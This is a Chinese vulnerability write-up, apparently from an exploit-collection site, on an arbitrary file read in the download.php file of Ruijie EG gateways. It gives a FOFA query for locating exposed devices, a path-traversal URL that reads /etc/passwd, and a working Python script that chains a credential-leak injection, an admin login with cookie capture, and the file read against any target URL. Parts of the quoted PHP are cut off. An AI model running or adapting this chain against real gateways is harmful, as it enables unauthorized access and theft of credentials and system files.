# 锐捷EG易网关 download.php 任意文件读取漏洞
## 漏洞描述
锐捷EG易网关 download.php 存在后台任意文件读取漏洞,导致可以读取服务器任意文件
## 漏洞影响
> 锐捷EG易网关
## FOFA
> app=”Ruijie-EG易网关”
## 漏洞复现
首先登录到后台中(可以组合 锐捷EG易网关 管理员账号密码泄露漏洞)
漏洞文件 download.php
“`php
_checkfile(iconv(“UTF-8”, “GB2312”,$filepath));
if ($filepointer !== false) {
if (headers_sent()) {
$this->error = “无法下载文件,已经输出其他请求头!”;
} else {
header(“Pragma: public”);
header(“Expires: 0”);
header(“Cache-Control: must-revalidate, post-check=0, pre-check=0”);
header(“Cache-Control: private”, false);
header(“Content-Type: {$this->_getMimeType($filename)}”);
header(“Content-Disposition: attachment; filename=\”{$filename}\”;”);
header(“Content-Transfer-Encoding: binary”);
header(“Content-Length: {$this->_getFileSize($filepointer)}”);
@ob_clean();
rewind($filepointer);
fpassthru($filepointer);
exit();
}
}
if ($this->error) { //有错误产生
?>
true, “data” => $fileContent);
json_echo($data);
}
}
/**
* 文件检查
*/
private function _checkfile($filename) {
if ($filename == false) {
$this->error = “请指定要下载的文件!”;
return FALSE;
}
$isallow = false;
foreach ($this->allow as $pattern) {
if (preg_match($pattern, $filename)) {
$isallow = true;
break;
}
}
if (!$isallow) {
$this->error = “该文件不允许下载!”;
return FALSE;
}
if (!is_file($filename)) {
$this->error = “该文件不存在!”;
return FALSE;
} else if (!is_readable($filename)) {
//if (system(“chmod +r ” . escapeshellarg($filename))) {
$this->error = “无法下载该文件,没有权限!”;
return FALSE;
//}
}
return fopen($filename, “rb”);
}
/**
* 获取文件mime类型
* @param string $fileName 文件名
* @return string
*/
private function _getMimeType($fileName) {
$charset = v(“charset”);
switch (pathinfo($fileName, PATHINFO_EXTENSION)) {
case “pdf”: return “application/pdf”;
case “exe”: return “application/octet-stream”;
case “zip”: return “application/zip”;
case “doc”: return “application/msword”;
case “xls”: return “application/vnd.ms-excel”;
case “ppt”: return “application/vnd.ms-powerpoint”;
case “gif”: return “image/gif”;
case “png”: return “image/png”;
case “jpeg”:
case “jpg”: return “image/jpg”;
case “htm”: return “text/html;charset=gbk”;
case “html”: if(!$charset) {
return “text/html;charset=gbk”;
}else {
return “text/html;charset=UTF-8”;
}
default: return “application/force-download”;
}
}
/**
* 获取文件大小
* @return int
*/
private function _getFileSize($filePointer) {
$stat = fstat($filePointer);
return $stat[‘size’];
}
}
include_once AROOT.’init.php’; //mvc初始化入口,放在底部
“`
关键代码为
“`php
/**
* 读取文本文件内容,支持ajax请求
*/
public function read_txtAction() {
$filename = v(“file”);
if (!file_exists($filename)) {
$data[“status”] = 2;
$data[“msg”] = $filename . “不存在”;
json_echo($data);
exit();
} else {
$fileContent = file_get_contents($filename);
$data = array(“status” => true, “data” => $fileContent);
json_echo($data);
}
}
“`
直接从Get请求中提取 file参数读取文件,可以使用 **../** 跳转目录
验证POC
“`
/download.php?a=read_txt&file=../../../../etc/passwd
“`
![](/static/qingy/锐捷EG易网关_download.php_任意文件读取漏洞/img/ruijie-33.png)
## 漏洞POC
“`python
#!/usr/bin/python3
#-*- coding:utf-8 -*-
import base64
import requests
import random
import re
import json
import sys
def POC_1(target_url):
vuln_url = target_url + “/login.php”
headers = {
“User-Agent”: “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36”,
“Content-Type”: “application/x-www-form-urlencoded”
}
data = ‘username=admin&password=admin?show+webmaster+user’
try:
response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=10)
print(“\033[36m[o] 正在执行 show webmaster user \033[0m”.format(target_url))
if “data” in response.text and response.status_code == 200:
password = re.findall(r’admin (.*?)”‘, response.text)[0]
print(“\033[36m[o] 成功获取, 账号密码为: admin {} \033[0m”.format(password))
POC_2(target_url, password)
except Exception as e:
print(“\033[31m[x] 请求失败:{} \033[0m”.format(e))
sys.exit(0)
def POC_2(target_url, password):
vuln_url = target_url + “/login.php”
headers = {
“User-Agent”: “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36”,
“Content-Type”: “application/x-www-form-urlencoded”
}
data = ‘username=admin&password={}’.format(password)
try:
response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=10)
print(“\033[36m[o] 正在登录….. \033[0m”.format(target_url))
if “status” in response.text and “1” in response.text and response.status_code == 200:
ruijie_cookie = “RUIJIEID=” + re.findall(r”‘Set-Cookie’: ‘RUIJIEID=(.*?);”, str(response.headers))[0] + “;user=admin;”
print(“\033[36m[o] 成功获取管理员Cookie: {} \033[0m”.format(ruijie_cookie))
POC_3(target_url, ruijie_cookie)
except Exception as e:
print(“\033[31m[x] 请求失败:{} \033[0m”.format(e))
sys.exit(0)
def POC_3(target_url, ruijie_cookie):
vuln_url = target_url + “/download.php?a=read_txt&file=../../../../etc/passwd”
headers = {
“User-Agent”: “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36”,
“Content-Type”: “application/x-www-form-urlencoded”,
“Cookie”: “{}”.format(ruijie_cookie)
}
try:
response = requests.post(url=vuln_url, headers=headers, verify=False, timeout=10)
print(“\033[36m[o] 正在读取 /etc/passwd….. \033[0m”.format(target_url))
if “root:” in response.text and response.status_code == 200:
print(“\033[36m[o] 成功读取 /etc/passwd \n[o] 响应为:{} \033[0m”.format(response.text))
except Exception as e:
print(“\033[31m[x] 请求失败:{} \033[0m”.format(e))
sys.exit(0)
if __name__ == ‘__main__’:
title()
target_url = str(input(“\033[35mPlease input Attack Url\nUrl >>> \033[0m”))
POC_1(target_url)
“`
请登录后查看评论内容